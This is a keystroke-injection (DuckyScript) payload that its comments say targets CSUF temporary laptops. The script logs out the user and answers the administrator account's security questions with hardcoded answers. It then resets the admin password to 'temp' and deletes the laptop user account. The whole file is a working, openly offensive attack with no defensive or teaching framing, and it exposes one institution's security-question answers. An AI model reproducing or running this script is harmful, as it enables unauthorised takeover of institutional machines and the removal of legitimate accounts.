REM original script written by Ahad Hussain
REM executing a payload on CSUF temporary laptops
REM signs out of the user account, answers security questions, then resets admin password
REM proceeds to delete the auto scripts and removes the temporary account

REM logs out of user account
DELAY 1000
CTRL ESC
DELAY 200
TAB
DELAY 200
DOWN
DELAY 200
ENTER
DELAY 200
DOWN
DELAY 200
DOWN
DELAY 200
ENTER
DELAY 5000

REM resets admin password 
ENTER
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
STRING test
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
STRING Fullerton
DELAY 200
TAB
DELAY 200
STRING CSUF
DELAY 200
TAB
DELAY 200
STRING Tuffy
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
STRING temp
DELAY 200
TAB
DELAY 200
STRING temp
DELAY 200
TAB
DELAY 200
ENTER
DELAY 4000

REM delete laptopuser account
WINDOWS
DELAY 3000
STRING Add, edit, or remove other users
DELAY 2000
ENTER
DELAY 2000

SHIFT TAB
DELAY 1000
ENTER
DELAY 500
TAB
DELAY 500
TAB
DELAY 200
ENTER
DELAY 200
